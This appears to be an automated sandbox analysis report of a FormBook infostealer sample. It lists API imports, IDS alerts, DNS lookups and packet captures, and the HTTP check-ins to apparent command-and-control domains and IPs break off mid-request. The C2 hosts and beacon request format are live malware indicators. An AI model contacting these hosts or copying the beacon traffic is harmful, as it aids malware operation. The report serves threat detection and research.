                                                            ADVAPI32.dllGetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
                                                            SHELL32.dllDragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
                                                            ole32.dllCoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
                                                            OLEAUT32.dllRegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

                                                            Possible Origin

                                                            Language of compilation systemCountry where language is spokenMap
                                                            EnglishGreat Britain

                                                            Network Behavior

                                                            Suricata IDS Alerts

                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                            2024-11-25T13:45:03.450115+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649827154.216.76.8080TCP
                                                            2024-11-25T13:45:03.450115+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649827154.216.76.8080TCP
                                                            2024-11-25T13:45:20.641849+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6498663.33.130.19080TCP
                                                            2024-11-25T13:45:23.406485+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6498743.33.130.19080TCP
                                                            2024-11-25T13:45:26.016198+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6498833.33.130.19080TCP
                                                            2024-11-25T13:45:28.719654+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.6498903.33.130.19080TCP
                                                            2024-11-25T13:45:28.719654+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6498903.33.130.19080TCP
                                                            2024-11-25T13:45:35.709825+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649906203.161.49.19380TCP
                                                            2024-11-25T13:45:38.417505+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649913203.161.49.19380TCP
                                                            2024-11-25T13:45:41.101249+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.649919203.161.49.19380TCP
                                                            2024-11-25T13:45:43.659303+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.649928203.161.49.19380TCP
                                                            2024-11-25T13:45:43.659303+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.649928203.161.49.19380TCP
                                                            2024-11-25T13:45:50.648849+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6499453.33.130.19080TCP
                                                            2024-11-25T13:45:53.210916+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6499523.33.130.19080TCP
                                                            2024-11-25T13:45:55.867569+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6499583.33.130.19080TCP
                                                            2024-11-25T13:45:58.579118+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.6499643.33.130.19080TCP
                                                            2024-11-25T13:45:58.579118+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6499643.33.130.19080TCP
                                                            2024-11-25T13:46:05.569306+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6499803.33.130.19080TCP
                                                            2024-11-25T13:46:08.305397+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6499863.33.130.19080TCP
                                                            2024-11-25T13:46:11.040675+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.6499943.33.130.19080TCP
                                                            2024-11-25T13:46:13.971819+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.6500043.33.130.19080TCP
                                                            2024-11-25T13:46:13.971819+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.6500043.33.130.19080TCP
                                                            2024-11-25T13:46:22.569295+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650022198.252.98.5480TCP
                                                            2024-11-25T13:46:25.223693+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650028198.252.98.5480TCP
                                                            2024-11-25T13:46:27.927685+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.650029198.252.98.5480TCP

                                                            Network Port Distribution

                                                            TCP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Nov 25, 2024 13:45:01.761380911 CET4982780192.168.2.6154.216.76.80
                                                            Nov 25, 2024 13:45:01.881459951 CET8049827154.216.76.80192.168.2.6
                                                            Nov 25, 2024 13:45:01.881556034 CET4982780192.168.2.6154.216.76.80
                                                            Nov 25, 2024 13:45:01.890682936 CET4982780192.168.2.6154.216.76.80
                                                            Nov 25, 2024 13:45:02.010791063 CET8049827154.216.76.80192.168.2.6
                                                            Nov 25, 2024 13:45:03.449635983 CET8049827154.216.76.80192.168.2.6
                                                            Nov 25, 2024 13:45:03.449657917 CET8049827154.216.76.80192.168.2.6
                                                            Nov 25, 2024 13:45:03.450114965 CET4982780192.168.2.6154.216.76.80
                                                            Nov 25, 2024 13:45:03.558433056 CET4982780192.168.2.6154.216.76.80
                                                            Nov 25, 2024 13:45:03.679193020 CET8049827154.216.76.80192.168.2.6
                                                            Nov 25, 2024 13:45:19.360208988 CET4986680192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:19.487195015 CET80498663.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:19.487473965 CET4986680192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:19.611828089 CET4986680192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:19.731841087 CET80498663.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:20.641779900 CET80498663.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:20.641849041 CET4986680192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:21.113703012 CET4986680192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:21.234733105 CET80498663.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:22.132657051 CET4987480192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:22.252656937 CET80498743.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:22.252769947 CET4987480192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:22.263685942 CET4987480192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:22.385926008 CET80498743.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:23.406364918 CET80498743.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:23.406485081 CET4987480192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:23.770234108 CET4987480192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:23.890677929 CET80498743.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:24.790901899 CET4988380192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:24.911628962 CET80498833.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:24.911747932 CET4988380192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:24.923760891 CET4988380192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:25.043852091 CET80498833.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:25.043885946 CET80498833.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:26.015866041 CET80498833.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:26.016197920 CET4988380192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:26.426163912 CET4988380192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:26.546211958 CET80498833.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:27.454406977 CET4989080192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:27.574403048 CET80498903.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:27.574532986 CET4989080192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:27.582034111 CET4989080192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:27.702187061 CET80498903.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:28.719489098 CET80498903.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:28.719515085 CET80498903.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:28.719654083 CET4989080192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:28.722680092 CET4989080192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:28.842654943 CET80498903.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:34.317651033 CET4990680192.168.2.6203.161.49.193
                                                            Nov 25, 2024 13:45:34.438114882 CET8049906203.161.49.193192.168.2.6
                                                            Nov 25, 2024 13:45:34.438390970 CET4990680192.168.2.6203.161.49.193
                                                            Nov 25, 2024 13:45:34.450251102 CET4990680192.168.2.6203.161.49.193
                                                            Nov 25, 2024 13:45:34.570185900 CET8049906203.161.49.193192.168.2.6
                                                            Nov 25, 2024 13:45:35.709458113 CET8049906203.161.49.193192.168.2.6
                                                            Nov 25, 2024 13:45:35.709780931 CET8049906203.161.49.193192.168.2.6
                                                            Nov 25, 2024 13:45:35.709825039 CET4990680192.168.2.6203.161.49.193
                                                            Nov 25, 2024 13:45:35.957592010 CET4990680192.168.2.6203.161.49.193
                                                            Nov 25, 2024 13:45:36.976888895 CET4991380192.168.2.6203.161.49.193
                                                            Nov 25, 2024 13:45:37.097455978 CET8049913203.161.49.193192.168.2.6
                                                            Nov 25, 2024 13:45:37.097542048 CET4991380192.168.2.6203.161.49.193
                                                            Nov 25, 2024 13:45:37.109692097 CET4991380192.168.2.6203.161.49.193
                                                            Nov 25, 2024 13:45:37.229650021 CET8049913203.161.49.193192.168.2.6
                                                            Nov 25, 2024 13:45:38.417433977 CET8049913203.161.49.193192.168.2.6
                                                            Nov 25, 2024 13:45:38.417452097 CET8049913203.161.49.193192.168.2.6
                                                            Nov 25, 2024 13:45:38.417505026 CET4991380192.168.2.6203.161.49.193
                                                            Nov 25, 2024 13:45:38.613883018 CET4991380192.168.2.6203.161.49.193
                                                            Nov 25, 2024 13:45:39.632834911 CET4991980192.168.2.6203.161.49.193
                                                            Nov 25, 2024 13:45:39.753650904 CET8049919203.161.49.193192.168.2.6
                                                            Nov 25, 2024 13:45:39.753772020 CET4991980192.168.2.6203.161.49.193
                                                            Nov 25, 2024 13:45:39.778448105 CET4991980192.168.2.6203.161.49.193
                                                            Nov 25, 2024 13:45:39.898418903 CET8049919203.161.49.193192.168.2.6
                                                            Nov 25, 2024 13:45:39.898538113 CET8049919203.161.49.193192.168.2.6
                                                            Nov 25, 2024 13:45:41.100908995 CET8049919203.161.49.193192.168.2.6
                                                            Nov 25, 2024 13:45:41.101022959 CET8049919203.161.49.193192.168.2.6
                                                            Nov 25, 2024 13:45:41.101248980 CET4991980192.168.2.6203.161.49.193
                                                            Nov 25, 2024 13:45:41.285659075 CET4991980192.168.2.6203.161.49.193
                                                            Nov 25, 2024 13:45:42.305468082 CET4992880192.168.2.6203.161.49.193
                                                            Nov 25, 2024 13:45:42.425537109 CET8049928203.161.49.193192.168.2.6
                                                            Nov 25, 2024 13:45:42.425652981 CET4992880192.168.2.6203.161.49.193
                                                            Nov 25, 2024 13:45:42.436083078 CET4992880192.168.2.6203.161.49.193
                                                            Nov 25, 2024 13:45:42.556210041 CET8049928203.161.49.193192.168.2.6
                                                            Nov 25, 2024 13:45:43.659126043 CET8049928203.161.49.193192.168.2.6
                                                            Nov 25, 2024 13:45:43.659209967 CET8049928203.161.49.193192.168.2.6
                                                            Nov 25, 2024 13:45:43.659302950 CET4992880192.168.2.6203.161.49.193
                                                            Nov 25, 2024 13:45:43.662508011 CET4992880192.168.2.6203.161.49.193
                                                            Nov 25, 2024 13:45:43.782736063 CET8049928203.161.49.193192.168.2.6
                                                            Nov 25, 2024 13:45:49.334851027 CET4994580192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:49.455251932 CET80499453.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:49.455399990 CET4994580192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:49.467888117 CET4994580192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:49.588433981 CET80499453.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:50.648751974 CET80499453.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:50.648849010 CET4994580192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:50.973134041 CET4994580192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:51.093125105 CET80499453.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:51.992275953 CET4995280192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:52.112586975 CET80499523.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:52.112668991 CET4995280192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:52.125418901 CET4995280192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:52.245496988 CET80499523.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:53.210702896 CET80499523.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:53.210916042 CET4995280192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:53.629611015 CET4995280192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:53.749561071 CET80499523.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:54.649065018 CET4995880192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:54.769190073 CET80499583.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:54.769310951 CET4995880192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:54.780652046 CET4995880192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:54.901223898 CET80499583.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:54.901269913 CET80499583.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:55.867486000 CET80499583.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:55.867568970 CET4995880192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:56.286015987 CET4995880192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:56.407413006 CET80499583.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:57.304990053 CET4996480192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:57.425326109 CET80499643.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:57.427727938 CET4996480192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:57.439598083 CET4996480192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:57.559770107 CET80499643.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:58.578916073 CET80499643.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:58.579065084 CET80499643.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:45:58.579118013 CET4996480192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:58.582123995 CET4996480192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:45:58.702269077 CET80499643.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:46:04.250128031 CET4998080192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:46:04.370202065 CET80499803.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:46:04.370294094 CET4998080192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:46:04.384766102 CET4998080192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:46:04.505171061 CET80499803.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:46:05.569098949 CET80499803.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:46:05.569305897 CET4998080192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:46:05.895015001 CET4998080192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:46:06.015448093 CET80499803.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:46:07.038922071 CET4998680192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:46:07.158957958 CET80499863.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:46:07.159049988 CET4998680192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:46:07.180429935 CET4998680192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:46:07.300741911 CET80499863.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:46:08.302901030 CET80499863.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:46:08.305397034 CET4998680192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:46:08.693152905 CET4998680192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:46:08.813090086 CET80499863.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:46:09.775477886 CET4999480192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:46:09.895524025 CET80499943.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:46:09.895598888 CET4999480192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:46:10.116610050 CET4999480192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:46:10.236610889 CET80499943.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:46:10.236655951 CET80499943.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:46:11.040512085 CET80499943.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:46:11.040674925 CET4999480192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:46:11.631644011 CET4999480192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:46:11.902959108 CET80499943.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:46:12.696012974 CET5000480192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:46:12.868207932 CET80500043.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:46:12.868366957 CET5000480192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:46:12.879642010 CET5000480192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:46:12.999666929 CET80500043.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:46:13.971539974 CET80500043.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:46:13.971771002 CET80500043.33.130.190192.168.2.6
                                                            Nov 25, 2024 13:46:13.971818924 CET5000480192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:46:13.974847078 CET5000480192.168.2.63.33.130.190
                                                            Nov 25, 2024 13:46:14.094827890 CET80500043.33.130.190192.168.2.6

                                                            UDP Packets

                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Nov 25, 2024 13:45:00.939471006 CET5484153192.168.2.61.1.1.1
                                                            Nov 25, 2024 13:45:01.754430056 CET53548411.1.1.1192.168.2.6
                                                            Nov 25, 2024 13:45:18.602067947 CET5842553192.168.2.61.1.1.1
                                                            Nov 25, 2024 13:45:19.310136080 CET53584251.1.1.1192.168.2.6
                                                            Nov 25, 2024 13:45:33.728423119 CET5183453192.168.2.61.1.1.1
                                                            Nov 25, 2024 13:45:34.315078974 CET53518341.1.1.1192.168.2.6
                                                            Nov 25, 2024 13:45:48.688644886 CET5435453192.168.2.61.1.1.1
                                                            Nov 25, 2024 13:45:49.331501961 CET53543541.1.1.1192.168.2.6
                                                            Nov 25, 2024 13:46:03.635704994 CET6498953192.168.2.61.1.1.1
                                                            Nov 25, 2024 13:46:04.246927977 CET53649891.1.1.1192.168.2.6
                                                            Nov 25, 2024 13:46:20.635588884 CET5395253192.168.2.61.1.1.1
                                                            Nov 25, 2024 13:46:21.224195957 CET53539521.1.1.1192.168.2.6

                                                            DNS Queries

                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Nov 25, 2024 13:45:00.939471006 CET192.168.2.61.1.1.10xcf86Standard query (0)www.huiguang.xyzA (IP address)IN (0x0001)false
                                                            Nov 25, 2024 13:45:18.602067947 CET192.168.2.61.1.1.10x1070Standard query (0)www.beingandbecoming.ltdA (IP address)IN (0x0001)false
                                                            Nov 25, 2024 13:45:33.728423119 CET192.168.2.61.1.1.10xe90cStandard query (0)www.futurevision.lifeA (IP address)IN (0x0001)false
                                                            Nov 25, 2024 13:45:48.688644886 CET192.168.2.61.1.1.10xfa95Standard query (0)www.schedulemassage.xyzA (IP address)IN (0x0001)false
                                                            Nov 25, 2024 13:46:03.635704994 CET192.168.2.61.1.1.10xf842Standard query (0)www.mcfunding.orgA (IP address)IN (0x0001)false
                                                            Nov 25, 2024 13:46:20.635588884 CET192.168.2.61.1.1.10x934fStandard query (0)www.migorengya8.clickA (IP address)IN (0x0001)false

                                                            DNS Answers

                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Nov 25, 2024 13:44:08.369273901 CET1.1.1.1192.168.2.60xf6feNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                            Nov 25, 2024 13:44:08.369273901 CET1.1.1.1192.168.2.60xf6feNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                            Nov 25, 2024 13:45:01.754430056 CET1.1.1.1192.168.2.60xcf86No error (0)www.huiguang.xyz154.216.76.80A (IP address)IN (0x0001)false
                                                            Nov 25, 2024 13:45:19.310136080 CET1.1.1.1192.168.2.60x1070No error (0)www.beingandbecoming.ltdbeingandbecoming.ltdCNAME (Canonical name)IN (0x0001)false
                                                            Nov 25, 2024 13:45:19.310136080 CET1.1.1.1192.168.2.60x1070No error (0)beingandbecoming.ltd3.33.130.190A (IP address)IN (0x0001)false
                                                            Nov 25, 2024 13:45:19.310136080 CET1.1.1.1192.168.2.60x1070No error (0)beingandbecoming.ltd15.197.148.33A (IP address)IN (0x0001)false
                                                            Nov 25, 2024 13:45:34.315078974 CET1.1.1.1192.168.2.60xe90cNo error (0)www.futurevision.life203.161.49.193A (IP address)IN (0x0001)false
                                                            Nov 25, 2024 13:45:49.331501961 CET1.1.1.1192.168.2.60xfa95No error (0)www.schedulemassage.xyzschedulemassage.xyzCNAME (Canonical name)IN (0x0001)false
                                                            Nov 25, 2024 13:45:49.331501961 CET1.1.1.1192.168.2.60xfa95No error (0)schedulemassage.xyz3.33.130.190A (IP address)IN (0x0001)false
                                                            Nov 25, 2024 13:45:49.331501961 CET1.1.1.1192.168.2.60xfa95No error (0)schedulemassage.xyz15.197.148.33A (IP address)IN (0x0001)false
                                                            Nov 25, 2024 13:46:04.246927977 CET1.1.1.1192.168.2.60xf842No error (0)www.mcfunding.orgmcfunding.orgCNAME (Canonical name)IN (0x0001)false
                                                            Nov 25, 2024 13:46:04.246927977 CET1.1.1.1192.168.2.60xf842No error (0)mcfunding.org3.33.130.190A (IP address)IN (0x0001)false
                                                            Nov 25, 2024 13:46:04.246927977 CET1.1.1.1192.168.2.60xf842No error (0)mcfunding.org15.197.148.33A (IP address)IN (0x0001)false
                                                            Nov 25, 2024 13:46:21.224195957 CET1.1.1.1192.168.2.60x934fNo error (0)www.migorengya8.clickmigorengya8.clickCNAME (Canonical name)IN (0x0001)false
                                                            Nov 25, 2024 13:46:21.224195957 CET1.1.1.1192.168.2.60x934fNo error (0)migorengya8.click198.252.98.54A (IP address)IN (0x0001)false

                                                            HTTP Request Dependency Graph

                                                            • www.huiguang.xyz
                                                            • www.beingandbecoming.ltd
                                                            • www.futurevision.life
                                                            • www.schedulemassage.xyz
                                                            • www.mcfunding.org

                                                            HTTP Packets

                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.649827154.216.76.80803196C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 25, 2024 13:45:01.890682936 CET543OUTGET /hv6g/?Hx=ot9h&yX7=vSitAQgQO9xnWjtJgvvZZsk+23T/NzOm/sAr3nzbW6mT0FGB0/NYbIaPlj7BCWSFPaPgTx5lzENVl3g1chzGBem8ABx5elB2IpCI9aOC0eTdsykMK9iQYMJsZcXRFR0PJFreT4Q= HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.huiguang.xyz
                                                            Connection: close
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
                                                            Nov 25, 2024 13:45:03.449635983 CET827INHTTP/1.1 200 OK
                                                            Server: nginx
                                                            Date: Mon, 25 Nov 2024 12:45:03 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 601
                                                            Last-Modified: Thu, 21 Nov 2024 04:22:01 GMT
                                                            Connection: close
                                                            ETag: "673eb569-259"
                                                            Accept-Ranges: bytes
                                                            Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e e6 ad a3 e5 9c a8 e5 ae 89 e5 85 a8 e8 bf 9b e5 85 a5 2e 2e 2e 2e 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 73 63 72 69 70 74 3e 0a 76 61 72 20 5f 68 6d 74 20 3d 20 5f 68 6d 74 20 7c 7c 20 5b 5d 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 76 61 72 20 68 6d 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 73 63 72 69 70 74 22 29 3b 0a 20 20 68 6d 2e 73 72 63 20 3d 20 22 68 74 74 70 73 3a 2f 2f 68 6d 2e 62 61 69 64 75 2e 63 6f 6d 2f 68 6d 2e 6a 73 3f 63 66 39 35 66 61 33 39 66 34 61 37 32 63 65 36 62 38 35 62 62 66 62 65 39 65 61 64 62 39 35 61 22 3b 0a 20 20 76 61 72 20 73 20 3d 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 22 73 63 72 69 70 74 22 29 5b 30 5d 3b 20 0a 20 20 73 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 [TRUNCATED]
                                                            Data Ascii: <!doctype html><html><head> <title>.......</title> <meta charset="utf-8"><script>var _hmt = _hmt || [];(function() { var hm = document.createElement("script"); hm.src = "https://hm.baidu.com/hm.js?cf95fa39f4a72ce6b85bbfbe9eadb95a"; var s = document.getElementsByTagName("script")[0]; s.parentNode.insertBefore(hm, s);})();</script></head><body><script> window.onload = function() { setTimeout(function() { window.location.href = 'https://34.92.79.175:19817'; }, 1000); // 1 }; </script></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.6498663.33.130.190803196C:\Program Files (x86)\qMLrzcnlYymOXinSzLJToFkBWYtvDvmTGOOHHuAToRqDTSFPSxwUcCqikfquPepJCBoCFJ\tOxaspWNamv.exe
                                                            TimestampBytes transferredDirectionData
                                                            Nov 25, 2024 13:45:19.611828089 CET831OUTPOST /79tr/ HTTP/1.1
                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            Host: www.beingandbecoming.ltd
                                                            Connection: close
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Content-Length: 208
                                                            Cache-Control: no-cache
                                                            Origin: http://www.beingandbecoming.ltd
                                                            Referer: http://www.beingandbecoming.ltd/79tr/
                                                            User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; A3-A10 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/30.0.0.0 Safari/537.36
